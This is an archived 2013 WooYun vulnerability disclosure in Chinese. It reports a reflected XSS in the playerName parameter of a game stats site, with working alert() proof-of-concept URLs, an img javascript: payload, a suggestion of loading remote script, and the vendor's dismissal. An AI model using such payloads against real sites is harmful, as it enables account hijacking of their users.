LOL盒子DOM XSS(可劫持账号) | wooyun-2013-038554

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-038554

漏洞标题：

LOL盒子DOM XSS(可劫持账号)

漏洞详情

披露状态：

2013-11-06：细节已通知厂商并且等待厂商处理中
2013-11-07：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

LOL盒子某处未过滤,导致反射性XSS

详细说明：

在lol盒子我的对战处嵌套了一个超文本框（反正易语言是这么叫的）、
然后右键得出了URL

http://lolbox.duowan.com/matchList.php?serverName=%E7%94%B5%E4%BF%A1%E4%BA%8C&playerName=%3Cscript%3Ealert(/1/);%3C/script%3E

然后playname 参数为可控，然后输入点在

<a href="playerDetail.php?serverName=%E7%94%B5%E4%BF%A1%E4%BA%8C&amp;playerName=%3Cscript%3Ealert%28%2F1%2F%29%3B%3C%2Fscript%3E">

a标签后，我们可以输入自己的标签进行测试如img ...
据说这里还可以直接用jquery的方法 $.getscript 方法进行

漏洞证明：

DOM如下：

<a href="playerDetail.php?serverName=%E7%94%B5%E4%BF%A1%E4%BA%8C&amp;playerName=%3Cimg+src%3Djavascript%3Aalert%281%29%3B%2F%3E"><img src="javascript:void(0)">（祖安）</a>

修复方案：

你们懂得

版权声明：转载请注明来源 y0umer@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-11-07 10:17

厂商回复：

我们进行了验证，后台已经进行了过滤，只是前端显示而已

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 y0umer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 y0umer@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞